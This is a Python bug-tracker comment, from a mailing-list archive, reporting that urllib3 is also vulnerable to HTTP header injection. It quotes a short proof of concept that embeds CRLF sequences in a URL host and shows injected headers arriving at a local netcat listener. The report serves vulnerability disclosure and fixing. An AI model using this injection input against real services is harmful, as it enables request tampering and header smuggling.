STINNER Victor <vstin...@redhat.com> added the comment:
bpo-36276 has been marked as a duplicate of this issue. According to the following message, urllib3 is also vulnerable to HTTP Header Injection: https://bugs.python.org/issue36276#msg337837 Copy of Alvin Chang's msg337837: """ I am also seeing the same issue with urllib3 import urllib3 pool_manager = urllib3.PoolManager() host = "localhost:7777?a=1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123" url = "http://"; + host + ":8080/test/?test=a" try: info = pool_manager.request('GET', url).info() print(info) except Exception: pass nc -l localhost 7777 GET /?a=1 HTTP/1.1 X-injected: header TEST: 123:8080/test/?test=a HTTP/1.1 Host: localhost:7777 Accept-Encoding: identity """ ---------- _______________________________________ Python tracker <rep...@bugs.python.org> <https://bugs.python.org/issue30458> _______________________________________ _______________________________________________ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
